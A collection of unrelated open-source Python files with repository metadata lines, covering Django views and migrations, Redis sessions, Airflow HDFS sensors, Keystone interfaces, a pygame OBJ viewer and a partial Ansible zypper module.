context["has_components"] = len(component_ids) > 0
return context
def update_deployments_form(request, scenario_id):
if not request.user.is_authenticated() or not scenario_id or scenario_id < 0:
return
xml_file = request.POST['xml']
json_str = rest_validate(xml_file)
validation_result = json.loads(json_str)
valid = True if (validation_result['result'] == 0) else False
if not valid:
return HttpResponse(json_str, content_type="application/json")
model_scenario = ScenarioModel.objects.get(id=scenario_id)
if model_scenario is None:
return HttpResponse(json.dumps({'valid': False}), content_type="application/json")
if request.user != model_scenario.user:
raise PermissionDenied
try:
temp_scenario = Scenario(xml_file)
except ParseError:
return HttpResponse(json.dumps({'valid': False}), content_type="application/json")
extra_data = load_deployments_data(temp_scenario)
html = render_to_string("ts_om_edit/deployments_list.html", extra_data)
return HttpResponse(html)
| mpl-2.0 | 2,472,985,344,018,509,000 | 37.333333 | 112 | 0.647516 | false |
upconsulting/IsisCB | isiscb/isisdata/migrations/0078_auto_20180623_0200.py | 1 | 1055 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-06-23 02:00
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('isisdata', '0077_merge_20180607_0543'),
]
operations = [
migrations.AddField(
model_name='citation',
name='created_by_native',
field=models.ForeignKey(blank=True, help_text=b'The user who created this object.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='creator_of', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalcitation',
name='created_by_native',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL),
),
]
| mit | -4,456,069,879,641,526,000 | 36.678571 | 208 | 0.664455 | false |
trabacus-softapps/openerp-8.0-cc | openerp/addons/website_mail/__openerp__.py | 3 | 1696 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Website Mail',
'category': 'Hidden',
'summary': 'Website Module for Mail',
'version': '0.1',
'description': """Glue module holding mail improvements for website.""",
'author': 'OpenERP SA',
'depends': ['website', 'mail'],
'data': [
'views/snippets.xml',
'views/website_mail.xml',
'views/website_email_designer.xml',
'views/email_template_view.xml',
'security/website_mail.xml',
],
'css': [
'static/src/css/website_mail.css',
],
'js': [
'static/src/js/website_mail.js',
],
'qweb': [
'static/src/xml/website_mail.xml'
],
'installable': True,
'auto_install': True,
}
| agpl-3.0 | 4,391,138,260,093,430,300 | 34.333333 | 78 | 0.574882 | false |
donalm/webtest | lib/python/webtest/session_factory.py | 1 | 4655 | #!/usr/bin/env python
from txredisapi import UnixConnectionPool
from webtest.session_dict import PersistentSessionDict
from webtest import log
logger = log.get_logger()
def logging_errback(f, label="logging_errback"):
logger.error("%s: %s" % (label, f.getBriefTraceback()))
class RedisSessionFactory(object):
"""
A user's session with a system.
This utility class contains no functionality, but is used to
represent a session.
@ivar uid: A unique identifier for the session, C{bytes}.
@ivar _reactor: An object providing L{IReactorTime} to use for scheduling
expiration.
@ivar defaultSessionTimeout: timeout of a session, in seconds.
"""
defaultSessionTimeout = 900
_expireCall = None
_pool = None
@classmethod
def _connected(cls, ucp):
"""
We successfully connected to a Redis service. Persist the resulting
connection object as an attribute on the class
"""
cls._pool = ucp
return ucp
@classmethod
def _connection_failed(cls, f):
"""
Log and escalate connection failures
"""
logger.error("ERROR: connection to Redis failed: %s", f.getBriefTraceback())
return f
@classmethod
def connect(cls):
"""
Establish a connection to the Redis service (if none exists)
"""
if cls._pool is None:
df = UnixConnectionPool("/var/run/redis/redis.sock", poolsize=2, reconnect=False)
df.addCallback(cls._connected)
df.addErrback(cls._connection_failed)
return df
return cls._pool
@classmethod
def connect_and_execute(cls, method, *args, **kwargs):
"""
This method should be used as a wrapper around methods that require a
connection to Redis. If no connection exists, one is created before the
'wrapped' method is executed.
"""
try:
df = method(cls._pool, *args, **kwargs)
except AttributeError:
df = cls.connect()
df.addCallback(method, *args, **kwargs)
df.addErrback(logging_errback, "connect_and_execute")
return df
@classmethod
def retrieve(cls, uid, reactor):
"""
Connect to Redis and get data from the persistence layer for a UID
"""
return cls.connect_and_execute(cls._retrieve, uid, reactor)
@classmethod
def _retrieve(cls, pool, uid, reactor):
"""
Get data from the persistence layer for a UID
"""
session_data_df = pool.hgetall(uid)
session_data_df.addCallback(cls._retrieve_callback, uid, reactor)
session_data_df.addErrback(logging_errback, "pool.hgetall")
return session_data_df
@classmethod
def _retrieve_callback(cls, session_data, uid, reactor):
"""
Inject the dict we retrieved from the storage layer into a
PersistentSessionDict obect and return it
"""
return PersistentSessionDict(uid, session_data, cls, reactor)
@classmethod
def expire(cls, uid):
"""
Connect to Redis and expire/logout a session.
"""
return cls.connect_and_execute(cls._expire, uid)
@classmethod
def _expire(cls, pool, uid):
"""
Expire/logout a session.
"""
return pool.delete(uid)
@classmethod
def delete_keys_from_session(cls, uid, keys):
"""
Connect to Redis and remove keys from the session hash
"""
return cls.connect_and_execute(cls._delete_keys_from_session, uid, keys)
@classmethod
def _delete_keys_from_session(cls, pool, uid, keys):
"""
Remove keys from the session hash
"""
return pool.hdel(self.uid, *keys)
@classmethod
def patch_session(cls, uid, patch):
"""
Connect to Reis and set or update values in the session hash
"""
return cls.connect_and_execute(cls._patch_session, uid, patch)
@classmethod
def _patch_session(cls, pool, uid, patch):
"""
Set or update values in the session hash
"""
return pool.hmset(uid, patch)
@classmethod
def touch_session(cls, uid, timeout=None):
"""
Connect to Redis and update the session expiry
"""
if timeout is None:
timeout = cls.defaultSessionTimeout
return cls.connect_and_execute(cls._touch_session, uid, timeout)
@classmethod
def _touch_session(cls, pool, uid, timeout):
"""
Update the session expiry
"""
return pool.expire(uid, timeout)
| mit | 2,445,796,118,297,768,400 | 28.839744 | 93 | 0.610956 | false |
pinkavaj/gnuradio | gr-utils/python/modtool/modtool_newmod.py | 51 | 4256 | #
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
""" Create a whole new out-of-tree module """
import shutil
import os
import re
from optparse import OptionGroup
from gnuradio import gr
from modtool_base import ModTool, ModToolException
from scm import SCMRepoFactory
class ModToolNewModule(ModTool):
""" Create a new out-of-tree module """
name = 'newmod'
aliases = ('nm', 'create')
def __init__(self):
ModTool.__init__(self)
def setup_parser(self):
" Initialise the option parser for 'gr_modtool newmod' "
parser = ModTool.setup_parser(self)
parser.usage = '%prog nm [options]. \n Call %prog without any options to run it interactively.'
ogroup = OptionGroup(parser, "New out-of-tree module options")
ogroup.add_option("--srcdir", type="string",
help="Source directory for the module template.")
parser.add_option_group(ogroup)
return parser
def setup(self, options, args):
# Don't call ModTool.setup(), that assumes an existing module.
self._info['modname'] = options.module_name
if self._info['modname'] is None:
if len(args) >= 2:
self._info['modname'] = args[1]
else:
self._info['modname'] = raw_input('Name of the new module: ')
if not re.match('[a-zA-Z0-9_]+$', self._info['modname']):
raise ModToolException('Invalid module name.')
self._dir = options.directory
if self._dir == '.':
self._dir = './gr-%s' % self._info['modname']
try:
os.stat(self._dir)
except OSError:
pass # This is what should happen
else:
raise ModToolException('The given directory exists.')
if options.srcdir is None:
options.srcdir = '/usr/local/share/gnuradio/modtool/gr-newmod'
self._srcdir = gr.prefs().get_string('modtool', 'newmod_path', options.srcdir)
if not os.path.isdir(self._srcdir):
raise ModToolException('Could not find gr-newmod source dir.')
self.options = options
self._setup_scm(mode='new')
def run(self):
"""
* Copy the example dir recursively
* Open all files, rename howto and HOWTO to the module name
* Rename files and directories that contain the word howto
"""
print "Creating out-of-tree module in %s..." % self._dir,
try:
shutil.copytree(self._srcdir, self._dir)
os.chdir(self._dir)
except OSError:
raise ModToolException('Could not create directory %s.' % self._dir)
for root, dirs, files in os.walk('.'):
for filename in files:
f = os.path.join(root, filename)
s = open(f, 'r').read()
s = s.replace('howto', self._info['modname'])
s = s.replace('HOWTO', self._info['modname'].upper())
open(f, 'w').write(s)
if filename.find('howto') != -1:
os.rename(f, os.path.join(root, filename.replace('howto', self._info['modname'])))
if os.path.basename(root) == 'howto':
os.rename(root, os.path.join(os.path.dirname(root), self._info['modname']))
print "Done."
if self.scm.init_repo(path_to_repo="."):
print "Created repository... you might want to commit before continuing."
print "Use 'gr_modtool add' to add a new block to this currently empty module."
| gpl-3.0 | -72,103,753,874,746,850 | 40.72549 | 103 | 0.611607 | false |
Acehaidrey/incubator-airflow | airflow/providers/apache/hdfs/sensors/hdfs.py | 2 | 7151 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import re
import sys
from typing import Any, Dict, List, Optional, Pattern, Type
from airflow import settings
from airflow.providers.apache.hdfs.hooks.hdfs import HDFSHook
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
log = logging.getLogger(__name__)
class HdfsSensor(BaseSensorOperator):
"""Waits for a file or folder to land in HDFS"""
template_fields = ('filepath',)
ui_color = settings.WEB_COLORS['LIGHTBLUE']
@apply_defaults
def __init__(
self,
*,
filepath: str,
hdfs_conn_id: str = 'hdfs_default',
ignored_ext: Optional[List[str]] = None,
ignore_copying: bool = True,
file_size: Optional[int] = None,
hook: Type[HDFSHook] = HDFSHook,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
if ignored_ext is None:
ignored_ext = ['_COPYING_']
self.filepath = filepath
self.hdfs_conn_id = hdfs_conn_id
self.file_size = file_size
self.ignored_ext = ignored_ext
self.ignore_copying = ignore_copying
self.hook = hook
@staticmethod
def filter_for_filesize(result: List[Dict[Any, Any]], size: Optional[int] = None) -> List[Dict[Any, Any]]:
"""
Will test the filepath result and test if its size is at least self.filesize
:param result: a list of dicts returned by Snakebite ls
:param size: the file size in MB a file should be at least to trigger True
:return: (bool) depending on the matching criteria
"""
if size:
log.debug('Filtering for file size >= %s in files: %s', size, map(lambda x: x['path'], result))
size *= settings.MEGABYTE
result = [x for x in result if x['length'] >= size]
log.debug('HdfsSensor.poke: after size filter result is %s', result)
return result
@staticmethod
def filter_for_ignored_ext(
result: List[Dict[Any, Any]], ignored_ext: List[str], ignore_copying: bool
) -> List[Dict[Any, Any]]:
"""
Will filter if instructed to do so the result to remove matching criteria
:param result: list of dicts returned by Snakebite ls
:type result: list[dict]
:param ignored_ext: list of ignored extensions
:type ignored_ext: list
:param ignore_copying: shall we ignore ?
:type ignore_copying: bool
:return: list of dicts which were not removed
:rtype: list[dict]
"""
if ignore_copying:
regex_builder = r"^.*\.(%s$)$" % '$|'.join(ignored_ext)
ignored_extensions_regex = re.compile(regex_builder)
log.debug(
'Filtering result for ignored extensions: %s in files %s',
ignored_extensions_regex.pattern,
map(lambda x: x['path'], result),
)
result = [x for x in result if not ignored_extensions_regex.match(x['path'])]
log.debug('HdfsSensor.poke: after ext filter result is %s', result)
return result
def poke(self, context: Dict[Any, Any]) -> bool:
"""Get a snakebite client connection and check for file."""
sb_client = self.hook(self.hdfs_conn_id).get_conn()
self.log.info('Poking for file %s', self.filepath)
try:
# IMOO it's not right here, as there is no raise of any kind.
# if the filepath is let's say '/data/mydirectory',
# it's correct but if it is '/data/mydirectory/*',
# it's not correct as the directory exists and sb_client does not raise any error
# here is a quick fix
result = sb_client.ls([self.filepath], include_toplevel=False)
self.log.debug('HdfsSensor.poke: result is %s', result)
result = self.filter_for_ignored_ext(result, self.ignored_ext, self.ignore_copying)
result = self.filter_for_filesize(result, self.file_size)
return bool(result)
except Exception: # pylint: disable=broad-except
e = sys.exc_info()
self.log.debug("Caught an exception !: %s", str(e))
return False
class HdfsRegexSensor(HdfsSensor):
"""Waits for matching files by matching on regex"""
def __init__(self, regex: Pattern[str], *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self.regex = regex
def poke(self, context: Dict[Any, Any]) -> bool:
"""
Poke matching files in a directory with self.regex
:return: Bool depending on the search criteria
"""
sb_client = self.hook(self.hdfs_conn_id).get_conn()
self.log.info(
'Poking for %s to be a directory with files matching %s', self.filepath, self.regex.pattern
)
result = [
f
for f in sb_client.ls([self.filepath], include_toplevel=False)
if f['file_type'] == 'f' and self.regex.match(f['path'].replace('%s/' % self.filepath, ''))
]
result = self.filter_for_ignored_ext(result, self.ignored_ext, self.ignore_copying)
result = self.filter_for_filesize(result, self.file_size)
return bool(result)
class HdfsFolderSensor(HdfsSensor):
"""Waits for a non-empty directory"""
def __init__(self, be_empty: bool = False, *args: Any, **kwargs: Any):
super().__init__(*args, **kwargs)
self.be_empty = be_empty
def poke(self, context: Dict[str, Any]) -> bool:
"""
Poke for a non empty directory
:return: Bool depending on the search criteria
"""
sb_client = self.hook(self.hdfs_conn_id).get_conn()
result = sb_client.ls([self.filepath], include_toplevel=True)
result = self.filter_for_ignored_ext(result, self.ignored_ext, self.ignore_copying)
result = self.filter_for_filesize(result, self.file_size)
if self.be_empty:
self.log.info('Poking for filepath %s to a empty directory', self.filepath)
return len(result) == 1 and result[0]['path'] == self.filepath
else:
self.log.info('Poking for filepath %s to a non empty directory', self.filepath)
result.pop(0)
return bool(result) and result[0]['file_type'] == 'f'
| apache-2.0 | -5,695,859,827,206,844,000 | 40.097701 | 110 | 0.620892 | false |
jiwanlimbu/aura | keystone/identity/shadow_backends/base.py | 3 | 2845 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
from keystone import exception
@six.add_metaclass(abc.ABCMeta)
class ShadowUsersDriverBase(object):
"""Interface description for an Shadow Users driver."""
@abc.abstractmethod
def create_federated_user(self, domain_id, federated_dict):
"""Create a new user with the federated identity.
:param domain_id: The domain ID of the IdP used for the federated user
:param dict federated_dict: Reference to the federated user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_federated_user(self, idp_id, protocol_id, unique_id):
"""Return the found user for the federated identity.
:param idp_id: The identity provider ID
:param protocol_id: The federation protocol ID
:param unique_id: The unique ID for the user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def update_federated_user_display_name(self, idp_id, protocol_id,
unique_id, display_name):
"""Update federated user's display name if changed.
:param idp_id: The identity provider ID
:param protocol_id: The federation protocol ID
:param unique_id: The unique ID for the user
:param display_name: The user's display name
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_user(self, user_id):
"""Return the found user.
:param user_id: Unique identifier of the user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def create_nonlocal_user(self, user_dict):
"""Create a new non-local user.
:param dict user_dict: Reference to the non-local user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def set_last_active_at(self, user_id):
"""Set the last active at date for the user.
:param user_id: Unique identifier of the user
"""
raise exception.NotImplemented()
| apache-2.0 | -1,451,795,136,754,261,500 | 30.966292 | 78 | 0.669947 | false |
jennifersalas/3D_CA | objefileviewer.py | 1 | 2135 | # Basic OBJ file viewer. needs objloader from:
# http://www.pygame.org/wiki/OBJFileLoader
# LMB + move: rotate
# RMB + move: pan
# Scroll wheel: zoom in/out
import sys, pygame
from pygame.locals import *
from pygame.constants import *
from OpenGL.GL import *
from OpenGL.GLU import *
# IMPORT OBJECT LOADER
from objloader import *
pygame.init()
viewport = (800, 600)
# hx = viewport[0]/2
# hy = viewport[1]/2
srf = pygame.display.set_mode(viewport, OPENGL | DOUBLEBUF)
glLightfv(GL_LIGHT0, GL_POSITION, (-40, 2000, 1000, 0.0))
glLightfv(GL_LIGHT0, GL_AMBIENT, (0.2, 0.2, 0.2, 1.0))
glLightfv(GL_LIGHT0, GL_DIFFUSE, (0.5, 0.5, 0.5, 1.0))
glEnable(GL_LIGHT0)
glEnable(GL_LIGHTING)
glEnable(GL_COLOR_MATERIAL)
glEnable(GL_DEPTH_TEST)
glShadeModel(GL_SMOOTH) # most obj files expect to be smooth-shaded
# LOAD OBJECT AFTER PYGAME INIT
obj = OBJ(sys.argv[1], swapyz=False)
clock = pygame.time.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
width, height = viewport
gluPerspective(90.0, width/float(height), 1, 100.0)
glEnable(GL_DEPTH_TEST)
glMatrixMode(GL_MODELVIEW)
rx, ry = (0,0)
tx, ty = (0,0)
zpos = 5
rotate = move = False
while 1:
clock.tick(30)
for e in pygame.event.get():
if e.type == QUIT:
sys.exit()
elif e.type == KEYDOWN and e.key == K_ESCAPE:
sys.exit()
elif e.type == MOUSEBUTTONDOWN:
if e.button == 4: zpos = max(1, zpos-1)
elif e.button == 5: zpos += 1
elif e.button == 1: rotate = True
elif e.button == 3: move = True
elif e.type == MOUSEBUTTONUP:
if e.button == 1: rotate = False
elif e.button == 3: move = False
elif e.type == MOUSEMOTION:
i, j = e.rel
if rotate:
rx += i
ry += j
if move:
tx += i
ty -= j
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
# RENDER OBJECT
glTranslate(tx/20., ty/20., - zpos)
glRotate(ry, 1, 0, 0)
glRotate(rx, 0, 1, 0)
glCallList(obj.gl_list)
pygame.display.flip()
| agpl-3.0 | 1,352,245,264,052,173,600 | 26.025316 | 77 | 0.600468 | false |
stackforge/solum | solum/tests/api/camp/test_camp_v1_1_endpoint.py | 2 | 1330 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from solum.api.controllers.camp import camp_v1_1_endpoint
from solum import objects
from solum.tests import base
from solum.tests import fakes
@mock.patch('pecan.request', new_callable=fakes.FakePecanRequest)
@mock.patch('pecan.response', new_callable=fakes.FakePecanResponse)
class TestCAMPEndpoint(base.BaseTestCase):
def setUp(self):
super(TestCAMPEndpoint, self).setUp()
objects.load()
def test_camp_endpoint_get(self, resp_mock, request_mock):
cont = camp_v1_1_endpoint.CAMPv11EndpointController()
resp = cont.get()
self.assertEqual(200, resp_mock.status)
self.assertEqual('platform_endpoint', resp['result'].type)
self.assertEqual(camp_v1_1_endpoint.NAME_STRING, resp['result'].name)
| apache-2.0 | -2,591,464,329,070,112,000 | 39.30303 | 77 | 0.741353 | false |
STRML/OpenBazaar | node/constants.py | 3 | 1485 | # ######## KADEMLIA CONSTANTS ###########
BIT_NODE_ID_LEN = 160
HEX_NODE_ID_LEN = BIT_NODE_ID_LEN // 4
# Small number representing the degree of
# parallelism in network calls
alpha = 3
# Maximum number of contacts stored in a bucket
# NOTE: Should be an even number.
k = 80
# Maximum number of contacts stored in the
# replacement cache of a bucket
# NOTE: Should be an even number.
cache_k = 80
# Timeout for network operations
# [seconds]
rpcTimeout = 0.1
# Delay between iterations of iterative node lookups
# (for loose parallelism)
# [seconds]
iterativeLookupDelay = rpcTimeout / 2
# If a k-bucket has not been used for this amount of time, refresh it.
# [seconds]
refreshTimeout = 60 * 60 * 1000 # 1 hour
# The interval at which nodes replicate (republish/refresh)
# the data they hold
# [seconds]
replicateInterval = refreshTimeout
# The time it takes for data to expire in the network;
# the original publisher of the data will also republish
# the data at this time if it is still valid
# [seconds]
dataExpireTimeout = 86400 # 24 hours
# ####### IMPLEMENTATION-SPECIFIC CONSTANTS ###########
# The interval in which the node should check whether any buckets
# need refreshing or whether any data needs to be republished
# [seconds]
checkRefreshInterval = refreshTimeout / 5
# Max size of a single UDP datagram.
# Any larger message will be spread accross several UDP packets.
# [bytes]
udpDatagramMaxSize = 8192 # 8 KB
DB_PATH = "db/ob.db"
VERSION = "0.3.0"
| mit | 2,030,193,322,990,321,700 | 25.517857 | 70 | 0.723906 | false |
halberom/ansible-modules-extras | packaging/os/zypper.py | 6 | 13421 | #!/usr/bin/python -tt
# -*- coding: utf-8 -*-
# (c) 2013, Patrick Callahan <[email protected]>
# based on
# openbsd_pkg
# (c) 2013
# Patrik Lundin <[email protected]>
#
# yum
# (c) 2012, Red Hat, Inc
# Written by Seth Vidal <skvidal at fedoraproject.org>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from xml.dom.minidom import parseString as parseXML
DOCUMENTATION = '''
---
module: zypper
author:
- "Patrick Callahan (@dirtyharrycallahan)"
- "Alexander Gubin (@alxgu)"
- "Thomas O'Donnell (@andytom)"
- "Robin Roth (@robinro)"
version_added: "1.2"
short_description: Manage packages on SUSE and openSUSE
description:
- Manage packages on SUSE and openSUSE using the zypper and rpm tools.
options:
name:
description:
- package name or package specifier with version C(name) or C(name-1.0). You can also pass a url or a local path to a rpm file. When using state=latest, this can be '*', which updates all installed packages.
required: true
aliases: [ 'pkg' ]
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
required: false
choices: [ present, latest, absent ]
default: "present"
type:
description:
- The type of package to be operated on.
required: false
choices: [ package, patch, pattern, product, srcpackage, application ]
default: "package"
version_added: "2.0"
disable_gpg_check:
description:
- Whether to disable to GPG signature checking of the package
signature being installed. Has an effect only if state is
I(present) or I(latest).
required: false
default: "no"
choices: [ "yes", "no" ]
disable_recommends:
version_added: "1.8"
description:
- Corresponds to the C(--no-recommends) option for I(zypper). Default behavior (C(yes)) modifies zypper's default behavior; C(no) does install recommended packages.
required: false
default: "yes"
choices: [ "yes", "no" ]
force:
version_added: "2.2"
description:
- Adds C(--force) option to I(zypper). Allows to downgrade packages and change vendor or architecture.
required: false
default: "no"
choices: [ "yes", "no" ]
# informational: requirements for nodes
requirements:
- "zypper >= 1.0 # included in openSuSE >= 11.1 or SuSE Linux Enterprise Server/Desktop >= 11.0"
- rpm
'''
EXAMPLES = '''
# Install "nmap"
- zypper: name=nmap state=present
# Install apache2 with recommended packages
- zypper: name=apache2 state=present disable_recommends=no
# Apply a given patch
- zypper: name=openSUSE-2016-128 state=present type=patch
# Remove the "nmap" package
- zypper: name=nmap state=absent
# Install the nginx rpm from a remote repo
- zypper: name=http://nginx.org/packages/sles/12/x86_64/RPMS/nginx-1.8.0-1.sles12.ngx.x86_64.rpm state=present
# Install local rpm file
- zypper: name=/tmp/fancy-software.rpm state=present
# Update all packages
- zypper: name=* state=latest
# Apply all available patches
- zypper: name=* state=latest type=patch
'''
def get_want_state(m, names, remove=False):
packages_install = []
packages_remove = []
urls = []
for name in names:
if '://' in name or name.endswith('.rpm'):
urls.append(name)
elif name.startswith('-') or name.startswith('~'):
packages_remove.append(name[1:])
elif name.startswith('+'):
packages_install.append(name[1:])
else:
if remove:
packages_remove.append(name)
else:
packages_install.append(name)
return packages_install, packages_remove, urls
def get_installed_state(m, packages):
"get installed state of packages"
cmd = get_cmd(m, 'search')
cmd.extend(['--match-exact', '--verbose', '--installed-only'])
cmd.extend(packages)
return parse_zypper_xml(m, cmd, fail_not_found=False)[0]
def parse_zypper_xml(m, cmd, fail_not_found=True, packages=None):
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
dom = parseXML(stdout)
if rc == 104:
# exit code 104 is ZYPPER_EXIT_INF_CAP_NOT_FOUND (no packages found)
if fail_not_found:
errmsg = dom.getElementsByTagName('message')[-1].childNodes[0].data
m.fail_json(msg=errmsg, rc=rc, stdout=stdout, stderr=stderr, cmd=cmd)
else:
return {}, rc, stdout, stderr
elif rc in [0, 106, 103]:
# zypper exit codes
# 0: success
# 106: signature verification failed
# 103: zypper was upgraded, run same command again
if packages is None:
firstrun = True
packages = {}
solvable_list = dom.getElementsByTagName('solvable')
for solvable in solvable_list:
name = solvable.getAttribute('name')
packages[name] = {}
packages[name]['version'] = solvable.getAttribute('edition')
packages[name]['oldversion'] = solvable.getAttribute('edition-old')
status = solvable.getAttribute('status')
packages[name]['installed'] = status == "installed"
packages[name]['group'] = solvable.parentNode.nodeName
if rc == 103 and firstrun:
# if this was the first run and it failed with 103
# run zypper again with the same command to complete update
return parse_zypper_xml(m, cmd, fail_not_found=fail_not_found, packages=packages)
return packages, rc, stdout, stderr
m.fail_json(msg='Zypper run command failed with return code %s.'%rc, rc=rc, stdout=stdout, stderr=stderr, cmd=cmd)
def get_cmd(m, subcommand):
"puts together the basic zypper command arguments with those passed to the module"
is_install = subcommand in ['install', 'update', 'patch']
cmd = ['/usr/bin/zypper', '--quiet', '--non-interactive', '--xmlout']
# add global options before zypper command
if is_install and m.params['disable_gpg_check']:
cmd.append('--no-gpg-checks')
cmd.append(subcommand)
if subcommand != 'patch':
cmd.extend(['--type', m.params['type']])
if m.check_mode and subcommand != 'search':
cmd.append('--dry-run')
if is_install:
cmd.append('--auto-agree-with-licenses')
if m.params['disable_recommends']:
cmd.append('--no-recommends')
if m.params['force']:
cmd.append('--force')
return cmd
def set_diff(m, retvals, result):
packages = {'installed': [], 'removed': [], 'upgraded': []}
for p in result:
group = result[p]['group']
if group == 'to-upgrade':
versions = ' (' + result[p]['oldversion'] + ' => ' + result[p]['version'] + ')'
packages['upgraded'].append(p + versions)
elif group == 'to-install':
packages['installed'].append(p)
elif group == 'to-remove':
packages['removed'].append(p)
output = ''
for state in packages:
if packages[state]:
output += state + ': ' + ', '.join(packages[state]) + '\n'
if 'diff' not in retvals:
retvals['diff'] = {}
if 'prepared' not in retvals['diff']:
retvals['diff']['prepared'] = output
else:
retvals['diff']['prepared'] += '\n' + output
def package_present(m, name, want_latest):
"install and update (if want_latest) the packages in name_install, while removing the packages in name_remove"
retvals = {'rc': 0, 'stdout': '', 'stderr': '', 'changed': False, 'failed': False}
name_install, name_remove, urls = get_want_state(m, name)
if not want_latest:
# for state=present: filter out already installed packages
prerun_state = get_installed_state(m, name_install + name_remove)
# generate lists of packages to install or remove
name_install = [p for p in name_install if p not in prerun_state]
name_remove = [p for p in name_remove if p in prerun_state]
if not name_install and not name_remove and not urls:
# nothing to install/remove and nothing to update
return retvals
# zypper install also updates packages
cmd = get_cmd(m, 'install')
cmd.append('--')
cmd.extend(urls)
# allow for + or - prefixes in install/remove lists
# do this in one zypper run to allow for dependency-resolution
# for example "-exim postfix" runs without removing packages depending on mailserver
cmd.extend(name_install)
cmd.extend(['-%s' % p for p in name_remove])
retvals['cmd'] = cmd
result, retvals['rc'], retvals['stdout'], retvals['stderr'] = parse_zypper_xml(m, cmd)
if retvals['rc'] == 0:
# installed all packages successfully
# checking the output is not straight-forward because zypper rewrites 'capabilities'
# could run get_installed_state and recheck, but this takes time
if result:
retvals['changed'] = True
else:
retvals['failed'] = True
# return retvals
if m._diff:
set_diff(m, retvals, result)
return retvals
def package_update_all(m, do_patch):
"run update or patch on all available packages"
retvals = {'rc': 0, 'stdout': '', 'stderr': '', 'changed': False, 'failed': False}
if do_patch:
cmdname = 'patch'
else:
cmdname = 'update'
cmd = get_cmd(m, cmdname)
retvals['cmd'] = cmd
result, retvals['rc'], retvals['stdout'], retvals['stderr'] = parse_zypper_xml(m, cmd)
if retvals['rc'] == 0:
if result:
retvals['changed'] = True
else:
retvals['failed'] = True
if m._diff:
set_diff(m, retvals, result)
return retvals
def package_absent(m, name):
"remove the packages in name"
retvals = {'rc': 0, 'stdout': '', 'stderr': '', 'changed': False, 'failed': False}
# Get package state
name_install, name_remove, urls = get_want_state(m, name, remove=True)
if name_install:
m.fail_json(msg="Can not combine '+' prefix with state=remove/absent.")
if urls:
m.fail_json(msg="Can not remove via URL.")
if m.params['type'] == 'patch':
